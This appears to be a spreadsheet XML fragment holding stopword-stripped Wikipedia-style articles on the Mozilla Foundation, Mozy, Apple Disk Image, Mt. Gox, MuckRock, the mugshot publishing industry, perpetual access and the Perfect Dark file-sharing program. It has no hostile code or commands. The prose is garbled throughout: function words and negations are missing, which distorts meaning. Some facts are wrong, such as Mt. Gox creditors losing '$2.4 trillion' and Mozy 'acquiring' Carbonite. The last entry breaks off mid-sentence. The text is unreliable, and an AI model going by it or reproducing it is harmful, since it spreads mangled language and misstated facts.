    <t>mozilla foundation (stylized moz://a) american non-profit organization exists support collectively lead open source mozilla project. founded july 2003, organization sets policies govern development, operates infrastructure controls mozilla trademarks copyrights. owns taxable subsidiary: mozilla corporation, employs many mozilla developers coordinates releases mozilla firefox browser mozilla thunderbird email client. mozilla foundation founded netscape-affiliated mozilla organization. organization currently based silicon valley city mountain view, california, united states. mozilla foundation describes non-profit organization promotes openness, innovation participation internet". mozilla foundation guided mozilla manifesto, lists principles mozilla believes "are critical internet continue benefit public good well commercial aspects life". history february 1998, netscape created mozilla organization co-ordinate development mozilla application suite. when (netscape's parent) drastically scaled back involvement mozilla organization, mozilla foundation launched july 2003, ensure mozilla could survive without netscape. assisted initial creation mozilla foundation, transferring hardware intellectual property organization, employed three-person team first three months existence help transition, donated million foundation years. subsidiaries mozilla corporation august 2005, mozilla foundation announced creation mozilla corporation, described taxable subsidiary serves non-profit, public benefit goals parent, mozilla foundation, responsible product development, marketing distribution mozilla products". also handles relationships businesses, many generate income. unlike mozilla foundation, mozilla corporation tax-paying entity, gives much greater freedom revenue business activities pursue. from 2004 2014, majority revenue came deal google, default search engine firefox browser. november 2014, mozilla signed five-year partnership yahoo, making yahoo! search default search engine firefox yandex search default firefox russia baidu continues role default china. november 2017, mozilla terminated agreement yahoo years earlier planned. while numerous factors attributed decision terminate agreement, including mention mozilla declining revenues related switch, likely impetus related recent acquisition yahoo verizon oath. mozilla chief business legal officer denelle dixon, exercised contractual right terminate agreement yahoo! based number factors including what's best brand, effort provide quality search, broader content experience users. believe opportunities work oath verizon outside search." mozilla china beijing mozilla online (chinese: 北京谋智网络技术有限公司), a.k.a. mozilla china, wholly owned subsidiary mozilla corporation. mozilla china headquartered beijing. mzla technologies corporation january 2020, mozilla foundation announced thunderbird project would henceforth operating wholly owned subsidiary, mzla technologies corporation, order explore offering products services previously possible collect revenue partnerships non-charitable donations. financing mozilla foundation funded donations annual revenues mozilla corporation, amounting us$8.3 million 2016.initial funding 2003 came aol, donated us$2 million, mitch kapor donated us$300,000. group tax-exempt status section 501(c)(3) u.s. code, though mozilla corporation subsidiary taxable. 2006, mozilla foundation received us$66.8 million revenues, us$61.5 million attributed "search royalties" google.from 2004 2014, foundation deal google make google search default firefox browser search hence send search referrals; firefox themed google search site also made default home page firefox. original contract expired november 2006. however, google renewed contract november 2008 2011. december 2011, mozilla announced contract renewed least three years november 2014, three times amount previously paid, nearly us$300 million annually. approximately mozilla's royalties revenue 2014 derived contract.in november 2014, mozilla signed five-year partnership (effective december 2014) yahoo!, making yahoo! search default search engine firefox north america. this partnership came annual price us$375 million paid yahoo! acquirer event acquisition. there also clause stating mozilla reserved right terminate deal early want work acquirer, acquirer would still mozilla full year 2019. default search engine russia yandex, china, baidu.in november 2017, however, mozilla announced switching back google default search engine. this represented early termination yahoo partnership. people september 2020, mozilla foundation board directors seven members: mitchell baker (chair) brian behlendorf mohamed nanabhay navrina singh helen turvey nicole wong wambui kinyamark surman foundation's executive director. donations 2006, request theo raadt openbsd funding corporate entities make profit openssh packaged distributions, mozilla foundation donated $10,000 raadt openbsd openssh development. funds donated came money earned income provided google. mozilla foundation found without openssh, much work done developers would insecure unsafe methods, gave funds thank you.at 2010, mozilla foundation partnered knoxville effort raise awareness endangered pandas. panda (a.k.a. firefox) cubs born knoxville officially become part mozilla community. cubs named spark ember online voters mozilla broadcast 24-hour live video stream cubs several months. also czilla, localization popularization mozilla.org products czech republic list mozilla products notes references "mozilla foundation forms organization further creation free, open source internet software, including award-winning mozilla firefox browser". mozilla press center. retrieved august 2005. external links official website about mozilla foundation 2005 presentation mozilla foundation press release creation mozilla foundation meeting minutes weekly mozilla call mozilla labs mozilla research</t>
  </si>
  <si>
    <t>Mozy</t>
  </si>
  <si>
    <t>mozy online backup service windows macos users. linux support made available 2014. 2007 mozy acquired emc, 2013 mozy included backup recovery systems division's product list. september 2016, dell inc. acquired corporation form dell technologies, restructuring original dell inc. subsidiary dell technologies. march 2018, carbonite acquired mozy dell $148.5 million cash 2019 shut service, incorporating mozy's clients online backup service programs. history founded 2005, mozy originally created berkeley data systems american fork, utah. october 2007, acquired berkeley data systems, along mozy product line million.mozy headquartered seattle, washington, though majority employees pleasant grove, utah offices.on september 2016, dell inc. acquired corporation form dell technologies, restructuring original company subsidiary dell technologies. march 2018, dell sold mozy carbonite $145.8 million cash deal. carbonite announced plans shut service independent entity 2019, shifting mozy's clients online backup program. products mozy produced three products: mozyhome, mozypro, mozyenterprise. mozyhome consumer version mozy backup service, bought monthly subscription various plans. january 2012 mozy opened public beta cloud storage synchronization feature called mozy stash, free. mozyhome previously offered users unlimited amount storage space. february 2011 closed unlimited service began charging according much space used.mozypro business version mozy backup service. originally launched 2007, mozypro pricing updated 2012 businesses back number computers price. server backup, business purchased server pass additional monthly charge backed many servers liked.mozyenterprise larger organizations included support active directory, user groups company), administrator control user rights. mozy administrators, company detailed keyless activation pooled storage features 2013 blog post. mozy enterprise customers.with mozy products, initial backup, mozy backed changed portions files. backups could take place whenever computer use, either automatically scheduled times. user data encrypted locally strong encryption prior transfer 128-bit connection. users could choose managed encryption personal added security. mozy's security end-users shortcut data deletion process. mozy ssae type 27001 certified.in 2010, mozy launched mozyhome mozypro 2.0, adding support local backup, increased performance user interface consumers small businesses. december 2013, mozy received runner-up "backup recovery/archive product year" "cloud storage product year" awards awards barracuda message archiver barracuda networks cloud disaster recovery service evault products front. early 2018, mozy acquired largest competitor, carbonite inc. restore 2011, mozy launched "restore manager" software tool simplify process retrieving files mozy cloud. also possible restore mozy client, windows file tree, ordering external drive mozy. users restore either last version file backed previous iteration backed preceding thirty days ninety days depending product. reception mozy software listed many popular websites including filehippo, filehurry, softpedia. high user ratings good responses users. also corporation list online backup services comparison online backup services remote backup service list backup software references external links mozy: official site mozy review: macworld mozy online backup: reading manual michael horowitz computerworld.com (posted february 2011) everybody likes mozy--except part michael horowitz cnet (posted july 2007) everybody likes mozy--except part michael horowitz cnet (posted july 2007) hruska, joel july 2007). "online backup solutions: review". technica. retrieved 2008-03-03. arrington, michael. "tiny startup mozy nails multi-million dollar storage contract". techcrunch. retrieved 2007-07-16. mossberg, walt. "these services make backing your files safe inexpensive". wall street journal. retrieved 2007-07-16.</t>
  </si>
  <si>
    <t>Apple Disk Image</t>
  </si>
  <si>
    <t>apple disk image disk image format commonly used macos operating system. when opened, apple disk image mounted volume within finder. apple disk image structured according several proprietary disk image formats, including universal disk image format (udif) disk image format (ndif) apple disk image file's name usually ".dmg" extension. disk image compressed copy contents disk folder. disk images .dmg names. contents disk image, must first open disk image appears desktop finder window. features apple disk image files published mime type application/x-apple-diskimage. different file systems contained inside disk images, also support creating hybrid optical media images contain multiple file systems. some file systems supported include hierarchical file system (hfs), plus (hfs+), file allocation table (fat), iso9660, universal disk format (udf).apple disk images created using utilities bundled specifically disk copy v10.2 earlier disk utility v10.3 later. these utilities also apple disk image files images burning dvds. disk image files also managed command line interface using hdiutil utility.in v10.2.3, apple introduced compressed disk images internet-enabled disk images apple utility disk copy, later integrated disk utility 10.3. disk copy application ability display multilingual software license agreement mounting disk image. image mounted unless user indicates agreement license.an apple disk image allows secure password protection well file compression, hence serves security file distribution functions; disk image commonly used distribute software internet. history apple originally created disk image formats resource fork used applications could easily transferred mixed networks make internet. even resource forks declined disk images remained standard software distribution format. disk images allow distributor control finder's presentation window, commonly used instruct user copy application correct folder. previous version format, intended floppy disk images, usually referred "disk copy 4.2" format, version disk copy utility used handle images. similar format supported compression floppy disk images called dart.new disk image format (ndif) previous default disk image format disk images format generally .img (not confused .img disk image files) .smi file extension. files .smi extension actually applications mount embedded disk image, thus "self mounting image", intended earlier.universal disk image format (udif) native format disk image format disk images format typically .dmg extension. file format apple released documentation format, attempts reverse engineer parts format successful. encrypted layer reverse engineered implementation called vilefault spoonerism filevault).apple disk image files essentially disk images (i.e. contain block data) added metadata, optionally layers applied provide compression encryption. hdiutil, layers called cudifencoding cencryptedencoding.udif supports proprietary compression format apple), zlib, bzip2 v10.4), lzfse v10.11), lzma macos v10.15) compression internally. metadata udif metadata found disk image following data. this trailer described using following structure. values big-endian (powerpc byte ordering) plist contains blkx (blocks) key, information preceding data fork allocated. main data stored base64 block, using tables identified magic 'mish'. this 'mish' structure contains table blocks data position lengths "chunk" (usually chunk, compression create more). data resource fork information probably inherited ndif. encryption encryption layer comes versions. version trailer file, version (default since 10.5) puts beginning. whether encryption layer outside inside blkx metadata (udif) unclear reverse engineered documentation, judging vfcrack demonstration probably outside. utilities there options available extract files mount proprietary apple disk image format. some cross-platform conversion utilities are: dmg2img originally written perl; however, perl version longer maintained, project rewritten extracts disk image dmg, without handling file system inside. udif adc-compressed images (udco) supported since version 1.5. dmgextractor written java graphical user interface (gui), supports advanced features including aes-128 encrypted images udco images. sleuth kit. only handles uncompressed format, hfs+, apfs.most files unencrypted. because metadata found end, program understanding files nevertheless read normal disk image, long support file system inside. tools sort capacity include: cross-platform: 7-zip (hfs/hfs+), peazip (hfs/hfs+). windows: ultraiso, isobuster, macdrive (hfs/hfs+). unix-like: cdrecord mount (e.g. mount loop,ro hfsplus imagefile.dmg /mnt/mountpoint).tools specific support include: windows: transmac handle udif .dmg files sparsebundles, well hfs/hfs+ apfs. unknown whether handles encryption. used create bootable macos installers windows. free apple disk image viewer also exists, unknown much actually supports. unix-like: darling-dmg fuse module enabling easy file mounting linux. supports udif hfs/hfs+. also cloop diskimagemounter installer (macos) sparse image references external links apple developer connection quick look packagemaker installer o'reilly devcenter 16-5. create disk image directory terminal</t>
  </si>
  <si>
    <t>Mt. Gox</t>
  </si>
  <si>
    <t>bitcoin exchange based shibuya, tokyo, japan. launched 2010, handling bitcoin (btc) transactions worldwide early 2014, abruptly ceased operations amid revelations involvement loss/theft hundreds thousands bitcoins, worth hundreds millions dollars.in february 2014, suspended trading, closed website exchange service, filed bankruptcy protection creditors. april 2014, company began liquidation proceedings. although 200,000 bitcoins since "found", reasons disappearance—theft, fraud, mismanagement, combination these—were initially unclear. evidence presented april 2015 tokyo security company wizsec conclude "most missing bitcoins stolen straight cryptocurrency wallet time, beginning late 2011." founding (2006–2010) late 2006, programmer mccaleb thought building website users magic: gathering online fantasy-based card game service, trade "magic: gathering online" cards like stocks. january 2007, purchased domain name mtgox.com, short "magic: gathering online exchange". initially beta release, sometime around late 2007, service went live approximately three months mccaleb moved projects, decided worth time. 2009, reused domain name advertise card game wilds.in july 2010, mccaleb read bitcoin slashdot, decided bitcoin community needed exchange trading bitcoin regular currencies. july, launched exchange price quoting service deploying spare mtgox.com domain name. security breach, user leak, invalid addresses (2011) march 2011, mccaleb sold site french developer mark karpelès, living japan, stating really make mtgox potential would require time right now. i've decided pass torch someone better able take site next level."on june 2011, bitcoin exchange reported 25,000 (us$400,000 time) robbed accounts. then friday june, gox's user database leaked sale pastebin, signed ~craziestinger~ tied auto36299386@hushmail.com. theft bitcoins accounts continued, reportedly, throughout day. june, stream fraudulent trades caused nominal price bitcoin fraudulently drop cent exchange, hacker allegedly used credentials auditor's compromised computer transfer large number bitcoins illegally himself. used exchange's software sell nominally, creating massive "ask" order price. within minutes price corrected correct user-traded value. accounts equivalent $8,750,000 affected. prove still control coins, move 424,242 bitcoins "cold storage" address announced beforehand, executed block 132749.in october 2011, dozen transactions appeared block chain (block 150951) sent total 2,609 invalid addresses. private could ever assigned them, bitcoins effectively lost. while standard client would check error reject transactions, nodes network would not, exposing weakness protocol. processor world's bitcoin trades; issues (2013) february 2013, following introduction anti-money laundering requirements e-commerce/online payment system company dwolla, dwolla accounts became temporarily restricted. result, transactions accounts cancelled dwolla. funds never made back accounts. help desk issued following comment: "please advised actually allowed cancel withdrawals received never case working dwolla locate returned funds." funds finally returned may, nearly three months later, note: "please advised never cancel dwolla withdrawals again". march 2013, bitcoin transaction "blockchain" temporarily forked independent logs, differing rules transactions could accepted. bitcoin exchange briefly halted bitcoin deposits. bitcoin prices briefly dipped 23%, $37, event occurred, recovering previous level (approximately $48) following hours.by april 2013 2014 site grown point handling world's bitcoin trades, largest bitcoin intermediary world's leading bitcoin exchange. with prices increasing rapidly, suspended trading april "market cooldown". value single bitcoin fell $55.59 resumption trading, stabilizing $100. around mid-may 2013, traded 150,000 bitcoins day, bitcoin charts.on 2013 coinlab filed million lawsuit gox, alleging breach contract. companies formed partnership february 2013 coinlab handle gox's north american services. coinlab's lawsuit contended failed allow move existing u.s. canadian customers coinlab.on 2013 department homeland security (dhs) issued warrant seize money gox's u.s. subsidiary's account payment processor dwolla. warrant suggested immigration customs enforcement, investigative branch dhs, asserted subsidiary, licensed financial crimes enforcement network (fincen), operating unregistered money transmitter between july seized million subsidiary. june 2013, received money services business (msb) license fincen.mt. suspended withdrawals dollars june 2013. mizuho bank branch tokyo handled transactions pressured close account. july 2013, announced "fully resumed" withdrawals, september 2013, dollar withdrawals successfully completed.on august 2013, announced incurred "significant losses" crediting deposits fully cleared, deposits would longer credited funds transfer fully completed.wired magazine reported november 2013 customers experiencing delays weeks months withdrawing cash accounts. article said company "effectively frozen u.s. banking system regulatory problems". withdrawals halted; trading suspended; bitcoin missing (2014) customer complaints long delays mounting february 2014, 3,300 posts thread topic bitcoin talk online forum.on february 2014, halted bitcoin withdrawals. company said pausing withdrawal requests obtain clear technical view currency processes". company issued press release february 2014, stating issue transaction malleability: bitcoin software makes possible someone bitcoin network alter transaction details make seem like sending bitcoins bitcoin wallet occur fact occur. since transaction appears proceeded correctly, bitcoins resent. working bitcoin core development team others mitigate issue."on february 2014, withdrawals still halted competing exchanges back full operation, company published another press release indicating steps claimed taking address security issues. email interview wall street journal, mark karpelès refused comment increasing concerns among customers financial status exchange, give definite date withdrawals would resumed, wrote exchange would impose "new daily monthly limits" withdrawals resumed. poll 3,000 customers coindesk indicated polled customers still awaiting funds gox. median waiting time three months, poll respondents waiting three months more.on february 2014, withdrawals still halted, issued another statement, giving date resumption withdrawals. protest bitcoin enthusiasts outside building houses headquarters tokyo continued. citing "security concerns", moved offices different location shibuya. bitcoin prices quoted dropped prices exchanges, reflecting market's estimate unlikelihood paying customers.on february 2014, mark karpelès resigned board bitcoin foundation. day, posts company's twitter account removed.on february 2014, suspended trading, hours later website went offline, returning blank page. leaked alleged internal crisis management document claimed company insolvent, lost 744,408 bitcoins theft went undetected years.six major bitcoin exchanges released joint statement distancing gox, shortly gox's website went offline.on february 2014, reported website "decision taken close transactions time being", citing "recent news reports potential repercussions gox's operations". chief executive mark karpelès told reuters turning point".from february 2014 march, period problems, value bitcoin declined 36%.the united states department justice identified alexander vinnik, owner btc-e bitcoin exchange, alleged figure laundering gox's stolen bitcoins. bankruptcy; stolen bitcoin (2014–present) february 2014, filed tokyo form bankruptcy protection creditors called minji saisei civil rehabilitation) allow courts seek buyer, reporting liabilities billion ($65 million, time), 3.84 billion assets.the company said lost almost 750,000 customers' bitcoins, around 100,000 bitcoins, totaling around bitcoins, worth around $473 million near time filing. released statement saying, "the company believes high possibility bitcoins stolen," blamed hackers, began search missing bitcoins. chief executive karpelès said technical issues opened fraudulent withdrawals. also faced lawsuits customers.on march 2014, filed bankruptcy protection halt u.s. legal action temporarily traders alleged bitcoin exchange operation fraud.on march 2014, reported website found 199999.99 bitcoins—worth around $116 million—in digital wallet used prior june 2011. that brought total number bitcoins firm lost 650,000, 850,000.new evidence presented april 2015 tokyo security company wizsec conclude "most missing bitcoins stolen straight wallet time, beginning late 2011."on april, lawyers said karpelès would appear deposition dallas court, heed subpoena fincen. april 2014, gave plan rebuild bankruptcy protection, asked tokyo court allow liquidated.in january 2015 interview, kraken bitcoin exchange jesse powell discussed appointed bankruptcy trustee assist processing claims 127,000 creditors gox.ceo karpelès arrested august 2015 japanese police charged fraud embezzlement, manipulating computer system increase balance account—this charge related missing 650,000 bitcoins. after interrogated, japanese prosecutors accused misappropriating ¥315m ($2.6m) bitcoin deposited trading accounts investors gox, moving account controlled, approximately months failed early 2014.by 2016, creditors claimed lost $2.4 trillion went bankrupt, asked paid them. japanese trustee overseeing bankruptcy said million assets tracked distribute claimants, despite asserted weeks went bankrupt $500 million assets. trustee's interim legal accounting costs date, paid ultimately creditors, $5.5 million.in march 2018, trustee kobayashi said enough sold cover claims creditors.on march 2019, tokyo district court found karpelès guilty falsifying data inflate gox's holdings $33.5 million, sentenced months prison, suspended four years, meaning serve time unless commits additional offenses next four years. court acquitted karpelès number charges, including embezzlement aggravated breach trust, based belief karpelès acted without intent. nonetheless, verdict said karpelès inflicted "massive harm trust users" excuse" "abuse status authority perform clever criminal acts." karpelès issued statement saying "happy judged guilty" serious charges discussing proceed lawyers regarding conviction falsifying data charge.on january 2021 bloomberg news reported coinlab inc. made agreement nobuaki kobayashi, trustee bankruptcy, investment fund (mgiflp), unit fortress investment group. much remaining bitcoin tied bankruptcy proceedings would offered creditors.at creditors meeting october 2021 announced civil rehabilitation plan accepted creditors (representing total amount voting rights) billions dollars bitcoin would provided compensation. plan officially approved november 2021.as july 2022, japanese trustee holding close 142,000 bitcoins also digital currency exchange bitfinex, replaced world's largest bitcoin exchange, lost million bitcoin 2016 references external links official website mtgox co., ltd. bankruptcy docket united states courts archive, court listener free project</t>
  </si>
  <si>
    <t>MuckRock</t>
  </si>
  <si>
    <t>muckrock united states-based 501(c)(3) non-profit organization assists anyone filing governmental requests information freedom information (foia) public record laws around united states, publishes returned information website encourages journalism around history muckrock founded michael morisy mitchell kotler, graduates cornell university. site's beta version went online 2010, part boston globe’s globelab incubator program. muckrock granted 501(c)(3) non-profit status june 2016. june 2018, muckrock announced would merging documentcloud.in 2016, foia machine project merged muckrock. foia machine service helps make foia requests free. foia machine separate organization hosted center investigative reporting funded knight foundation, reynolds institute journalism, crowdfunding campaign. projects decided merge shared goals past partnerships. muckrock agreed continue providing foia machine free. operation filing requests information freedom information public record laws around united states described confusing tedious, despite intent process public service available american citizens. muckrock partially automates process interface designed make filing requests easier. also, muckrock acts middleman processing requests, user makes request muckrock, staff muckrock make request. when muckrock makes request, note timestamp website proof made. when reply comes request, muckrock publishes timestamps openly everyone reply made. information shared 2010, muckrock received notice government sent muckrock information supplemental nutrition assistance program secret muckrock must cease publishing staff would face fines jail time. state later said would jail muckrock staff.the boston police department suspended automatic number plate recognition program privacy concerns raised muckrock request.muckrock made numerous requests various united states state federal agencies regarding work booz allen hamilton. response federal bureau investigation bill $270,000 fulfill request.muckrock's request york city police department guidebook responding foia requests denied confidential document. lawsuit june 2014 muckrock sued freedom information "consistently ignoring deadlines, refusing work requesters, capriciously rejecting even routine requests clearly public information".the lawsuit current 2020. partners electronic frontier foundation made public records requests muckrock. references external links official website</t>
  </si>
  <si>
    <t>Mug shot publishing industry</t>
  </si>
  <si>
    <t>mugshot publishing industry niche market tabloid journalism united states. industry consists companies publish mugshots booking details individuals arrested enforcement agencies. these companies publish arrest information tabloids, local multi-jurisdictional search websites. related reputation management industry profits individuals mugshot removed websites; often entity owns publishing site removal service, allegations lawsuits extortionate practices arrests mugshot business owners charges identity theft, money laundering, extortion. 2018 journal american association called industry "online extortion scheme." publishing owners mugshot websites stated belief publishing information spur tips crime stoppers deter others committing crimes fear information published.arrest data photos public record, accessed websites enforcement agencies. however, many agencies small cities, towns counties provide online data. reduce probability mugshot going online, least florida attorney suggests clients pick rural sheriff's department surrender authorities. removal some sites remove information free charge complainant provides proof found guilty charges dropped. other sites charge regardless disposition case. this controversy state legislatures propose bills regulate industry. mugshots associated information published regardless whether person guilty convicted crime arrested for. industry become controversial lack case disposition. argued pointless mugshots removed "the internet never forgets." multiple archival services store content websites periodic basis, content retrieved time future. discrimination mugshot publication sites often pulled routine searches online things innocent employment housing. even someone record sealed, expunged reduced, even mugshot publishing site removed offending photos, still located. company utah recently outed leaked internal document hiring "white hackers" internet archives sites would readily visible typical internet user order eliminate otherwise qualified candidates. criticism 2018 journal american association called industry "online extortion scheme."some mugshot publishers refuse remove records regardless charges dropped, expunged, found guilty.in 2013 forbes reported "many sites either company themselves, created financial relationships owners sites remove content paid. most biggest firms involved kind mafia extortion."in 2013 david kravets, writing wired referred racket.in 2013 better business bureau launched investigation concluded first amendment right operate businesses, investigators felt "using high pressure unethical business practice intimidate individuals."in 2013 owner mugshot removal website directed blame police sheriff departments mugshots posted online arrest, source mugshot website photos. stated, "here's thing, police stop overnight that's part talking about. (authorities) posting mugshot someone simply missed traffic court?"in 2012 kenneth nunn, professor university florida's fredric levin college law, said mugshot sites look like seedy business," but, "there's nothing wrong posting further," said. "it's close extortion, although quite threat harm reputation, improve it," said.in 2012 gwinnett county georgia district attorney said, "it's wrong violation criminal laws. arbitrarily charging mugshot removal legal definition extortion photos public record.criticisms industry appeared online early 2009. private attempts block industry october 2013, david segal, reporter york times, published article critical mugshot publishing industry. prior publication seemingly response criticism, google took steps lower mugshot sites rankings search algorithms pictures longer appear first page search results person searched name. according york times article, payment processors visa, mastercard, discover, american express, paypal process terminating processing payments mugshot websites related removal sites. days later money reported, according american express, severed ties; companies still process cutting ties mugshot industry. legislation several state legislatures introduced bills regulate mugshot publishing industry. these bills often require operators mugshot websites remove information individuals arrested never convicted. this removal would occur specified period time without charging person arrested. arizona april 2019 arizona governor doug ducey signed arizona house bill 2191, took effect august 2019. this created statutes, a.r.s. 44-7901 44-7902 pertaining "mugshot website operators". operative portion law, a.r.s. 44-7902(b), provides: mugshot website operator criminal justice records names, addresses, telephone numbers information contained criminal justice records purpose soliciting business pecuniary gain, including requiring payment valuable consideration exchange removing revising criminal justice records published website publication." provides daily civil penalties starting $100 increasing $500 days. however, also contains broad exceptions explaining statute "does apply performed purpose disseminating news public, including gathering, publishing broadcasting information public news-related purpose california august 2015 california governor jerry brown signed senator jerry hill's senate bill 1027, went effect january 2015, prohibits websites publishing arrest mugshots charging take down. specifically, legislation makes unlawful solicit accept payment remove, correct modify mugshots. civil action brought website violates law. person entity brings suit seek damages equal greater $1,000 violation actual damages suffered. 1027 restrict access arrest records booking photos media interested individuals. colorado april 2014 house bill 14-1407 signed law. house bill 14-1407 requires commercial websites charges remove people’s mugshots identifying information remove information free person found innocent crime arrested. connecticut july 2014 connecticut state supreme court issued ruling restricts amount information police required release arrests. court ruled police required release basic “blotter” information arrests, including name address person arrested, date, time place arrest, criminal charges news release narrative arrest. under ruling, mugshots disclosed. florida june 2017 florida governor rick scott signed senate bill 118, took effect july 2018, prohibiting person entity engaged publishing disseminating arrest booking photographs soliciting accepting payment remove photograph. also requires entity remove arrest booking photographs within time frame receipt written request. should publisher photo refuse neglect comply, individual authorized bring civil court action court impose civil penalty compensated attorney fees court costs individual. text found 901.43 2020 florida statutes. georgia went effect georgia 2013, regulates mugshot websites handle requests remove individual's image. specifically, bill requires mugshot websites remove images persons cleared charges cannot charge removal. removal must completed within days request website cannot charge removal. georgia enacted another bill, effective july 2014, prohibits disclosure arrest booking photographs except certain circumstances; provide related matters; repeal conflicting laws; purposes. missouri july 2014 gov. nixon signed legislation making misdemeanor publish police booking photos websites seek money take photos down. hb1665 became effective august 2014. jersey jersey introduced bill would prevent dissemination mugshots suspect found guilty. measure (a3906), approved abstention assembly public safety committee, would amend state's open public records make confidential photographs anyone arrested convicted. oregon bill introduced oregon's house 2013 would forbid enforcement agency publishing mugshots online. single individual's mugshot booking information could still obtained written requests submitted person. bill amended removing provisions requires mugshot sites remove mugshots within days receiving paperwork showing charges result conviction. south carolina lawmakers sen. paul thurmond, r-charleston, 2016 enacted bill s255 would require websites take booking photos people aren’t found guilty. texas during 2013 legislative session, texas state senate passed bills regulating businesses publish mugshots accept payment remove information. requires businesses publish either e-mail address, number, mailing address allow people contact business. individual contact business disputing accuracy information published business. business days respond, writing, dispute results investigation dispute. bill also forbids businesses publishing arrest records anyone convicted establishes fine business utah april 2013, utah governor gary herbert signed law. bill prohibits booking photos appearing mugshot websites require payment remove image. requires individual requesting booking photos sign sworn statement image received used kinds websites. violations sworn statement could result criminal charges lying police. virginia march 2015 signed law. sb720 creates civil action person disseminates, publishes, maintains causes disseminated, published, maintained criminal history record information individual pertaining individual's charge arrest criminal offense solicits, requests, accepts money thing value removing information. such person shall liable individual subject information actual damages $500, whichever greater, addition reasonable attorney fees costs. litigation december 2012, case filed lucas county court common pleas, ohio, mugshot publishers. december 2013, settlement reached judge zouhary signed order dismissing litigation prejudice mugshot websites claimed violation laws. however, websites agree remove plaintiffs' mugshots longer charge process mugshot removals.lawyers ohio filed lawsuit behalf three plaintiffs. suit contends 250,000 people ohio harmed mugshot sites. settlement reached lawsuit december 2013 several mugshot publishing companies involved agreed remove plaintiffs' mugshots well settlement.on january 2016 multiple plaintiffs filed class action lawsuit mugshots.com unpublish owners sahar sarid thomas keesee operators illinois. case currently pending united states district court northern district illinois. case styled gabiola, keesee, al., 1:16-cv-02076.on 2018 california attorney general becerra announced criminal charges identity theft, money laundering, extortion four individuals believed behind cyber exploitation website mugshots.com. four charged arrested. thomas keesee sahar sarid charged affidavit characterized business "permeated fraud" described efforts conceal identities: "listing business address nevis, west indies, registering domain name belize using website hosting company australia. kishore vidya bhavnanie david usdan also arrested. several mugshots available online. four extradited california face charges. also book class action references</t>
  </si>
  <si>
    <t>Perpetual access</t>
  </si>
  <si>
    <t>perpetual access stated continuous access licensed electronic material longer accessible active paid subscription either library publisher action. many cases, parties involved license agree necessary license retain access materials license lapsed. other terms perpetual access similar trains thought ‘post-cancellation access’ ‘continuing access.'in licensing software products, perpetual license means software application sold one-time basis licensee copy software forever. license holder indefinite access specific version software program paying once. perpetual access term used within library community describe ability retain access electronic journals contractual agreement materials passed. typically library licenses access electronic journal, journal's content remains possession licensor. library often purchases rights back issues well issues. when license elapses, access journal's contents lost. typical print model, library purchases journals retains duration contract also contract expires. order retain access journals released term license digital electronic journals, library must obtain perpetual access rights.the ability maintain perpetual access seen shift print electronic material, apparent user demand advantages non-print material. electronic materials rely relationship library publisher, distinct dynamic publisher's control licensed material. this turn causes issues paid subscription publisher ends material uncertain inability share material. with shift physical print material electronic material, legality means purchase issue. concept first-sale doctrine formerly allowed lenient access physical print material longer applicable electronic material past legal precedent. this essentially points issue “for libraries, means legal ownership individual titles, storage unit (often piece hardware software), ability maintain files future tied content provider-often publisher software developer.”perpetual access closely related digital archiving, preservation electronic documents. however, archiving rights "the right permanently retain electronic copy licensed materials.” perpetual access rights focus continual access, archiving rights focus continual access receives continual access. often, institution retain perpetual access, must design preserve electronic documents granted license. several initiatives developed methods retain electronic documents retain perpetual access. notable lockss program ithaka portico program. concerns with license agreements perpetual access, communication publishers libraries large part process, agreement terms policy understanding always clear. licensing agreements always even include perpetual access. addition this, complexity involving perpetual access, libraries find choice electronic material understanding used access gone, option available.link rot, negligence denial domain renewal, closing information source examples technical issues directly effect ability maintain perpetual access. issues like perpetual access digital preservation garnered recent attention single discipline efforts government level. example keepers registry, equips libraries resources help navigate perpetual access digital preservation topics whole. despite cost effectiveness utilizing electronic material place print, cost maintaining electronic material hindrance spectrum library's ability maintain perpetual access, terms time staffing limitations. this turn creates barrier need continuous efforts libraries maintain monitor materials perpetual access beyond sole perpetual access granted.trigger events also another concern libraries option perpetual access capabilities. these events electronic material longer accessible months longer. example trigger event case access information made available lost natural event. related initiatives several initiatives developed methods retain electronic documents retain perpetual access. notable lockss program, clockss (controlled lockss), ithaka portico program. also digital preservation software license references external links clockss official site definition perpetual access oxford university press definition perpetual access portico dspace official site electronic resource management: report initiative keepers registry official site list participating publishers titles lockss lockss official site perpetual access post-cancellation access lockss perpetual access electronic journals: survey academic research library's licenses portico official site</t>
  </si>
  <si>
    <t>Perfect Dark (P2P)</t>
  </si>
  <si>
    <t>perfect dark (パーフェクトダーク) peer-to-peer file-sharing (p2p) application japan designed microsoft windows. launched 2006. author known pseudonym kaichō (会長, "the chairman"). perfect dark developed intention successor winny share software. while japan's association copyright computer software reported january 2014, number nodes connected perfect dark (24000) less share (44000), winny (12000), netagent 2018 reported winny largest nodes followed perfect dark nodes followed share 000. netagent asserts number nodes perfect dark fallen since 2015 numbers winny hold steady. netagent reports users perfect dark likely share books/manga. version 1.02 (2008), code-named "stand alone complex", support program english, option selected program installed. overview perfect dark still actively developed. author program's users point become dedicated "users" software. instead, author asks participate test phase. through test phase, author hopes reports discussion help shape perfect dark better program. dkt+dht+du author implements architecture called dkt+dht+du design network. these three parts compose entire network. "dkt" stands distributed keyword table. "dht" distributed hash table. "du" distributed unity."dkt" mainly providing effective file searching "dht" "du" used effective file sharing enhancing anonymity. network bandwidth requirement perfect dark higher bandwidth hard drive space requirements predecessors winny share. minimum upload speed kbit/s. perfect dark requires network bandwidth hard disk space winny share, forcing fairer load users. user perfect dark configured proper settings user unable support settings, download rates restricted priority given users. this intended increase retention rate perfect dark network. disk space requirement requires share minimum hard drive space, "unity" folder huge distributed hash table used distributed data store). file system requirement perfect dark requires ntfs file system instead fat32, fat32 limited file size perfect dark download files size features distributed datastore like japanese sharing software, perfect dark proprietary network called "unity". biggest characteristics perfect dark powerful search capability. using distributed hash tables, search performance greatly improved compared winny share, making unnecessary rely construction node clusters. this frees users inputting switching cluster keywords also enables users search files different genres time. this contrast winny share, cluster keywords, "dvdiso" "アニメ"/"anime" used specify types files user searching for. these keywords segregate network introduce delays user changes them. file search: tree search concept "tree search" brings strong search ability. addition, flexible and, boolean operators helps filtering undesirable results. text flow perfect dark includes original feature named "flow": window text lines written users scroll vertically. each user write little message (few lines columns), displayed peers using flow feature. automated update since version 1.02 perfect dark option automatically update (unity) network. messages boards perfect dark simple message board feature. boards distributed unity network. design rudimentary. boards, must searched file search feature, (for example) japanese keyword (board). security overall structure perfect dark network broadly resembles recent versions freenet, heavier distributed hash tables. anonymity relies mixnet traffic forwarded according certain probability, well deniability distributed data storage ("unity") stored transferred encrypted blocks keys distributed separately. perfect dark uses (1024-bit) (128-bit) encrypt data transmitted peers. exchanged keys 